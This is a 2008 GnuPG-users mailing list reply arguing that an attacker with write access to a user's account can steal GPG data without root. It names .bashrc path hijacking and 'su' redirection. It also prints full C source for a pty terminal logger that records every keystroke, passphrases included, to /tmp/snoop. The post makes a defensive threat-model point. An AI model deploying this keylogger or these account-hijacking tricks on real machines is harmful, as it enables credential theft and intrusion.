On Wed, Jun 11, 2008 at 04:31:45PM -0400, michael graffam wrote:
> On Wed, Jun 11, 2008 at 3:56 PM, David Shaw <[EMAIL PROTECTED]> wrote:
>
> > If the attacker had access to your machine to implement the LD_PRELOAD
> > attack, there are literally dozens of ways they can similarly steal
> > whatever data they are trying to steal. Why do a very complex attack
> > involving replacing libraries when they could just replace the GPG
> > binary itself?
>
>
> Replacing the GPG bin requires root. An LD_PRELOAD'ed lib doesn't.
Try it. I don't have to replace it for everyone - just you, and if I
can write to your computer, I can make you run any binary I want.
Remember, you own your own shell .rc file.
> Or add a shell script named 'gpg' and put it in your
> > search path ahead of the real gpg?
>
>
> Again, root.
Again, .bashrc.
> > Or turn on typescript by default.
>
>
> Doesn't save GPG passphrases.
Why would I care about getting your passphrase if I can get everything
you typed into the message before it was encrypted?
Still, just for laughs, here's a hack that will save everything typed
on a particular terminal, including passphrases (real error checking
and proper handling of sigchld left up to the reader):
#include <stdio.h>
#include <pty.h>
#include <unistd.h>
#include <termios.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
int
main(int argc,char *argv[])
{
int master,slave,snoop;
pid_t pid;
char byte;
snoop=open("/tmp/snoop",O_WRONLY|O_CREAT|O_TRUNC,0666);
pid=fork();
if(pid)
{
struct termios term;
tcgetattr(0,&term);
cfmakeraw(&term);
term.c_lflag&=~ECHO;
tcsetattr(0,TCSAFLUSH,&term);
close(slave);
for(;;)
{
if(read(0,&byte,1)==1)
{
write(master,&byte,1);
write(snoop,&byte,1);
}
}
}
else
{
pid=fork();
if(pid)
{
close(slave);
for(;;)
{
if(read(master,&byte,1)==1)
write(1,&byte,1);
}
}
else
{
setsid();
close(master);
dup2(slave,0);
dup2(slave,1);
dup2(slave,2);
close(slave);
execl("/bin/bash","/bin/bash","-i",NULL);
}
}
return 0;
}
> > Or load a kernel module that changes the meaning of system calls. Or
> > replace the rng with one that isn't random. Or, or, or.
>
>
> Root, root, root.
Do you seriously think that someone who can write to your user-level
account can't get root pretty soon? This can be as complex as reading
bugtraq for a while until a buffer overrun comes along, or as simple
as arranging for "su" to go somewhere else.
> Get it yet? LD_PRELOAD enables attacks against GPG w/o requiring full access
> to the box. The attacker just need access to the user's account.
I do get it. I'm not convinced that you do.
If an attacker has access to the user's account, it's game over. At
that point, it's just a question which particular method the attacker
will choose to completely own you.
David
_______________________________________________
Gnupg-users mailing list
Gnupg-users@gnupg.org
http://lists.gnupg.org/mailman/listinfo/gnupg-users
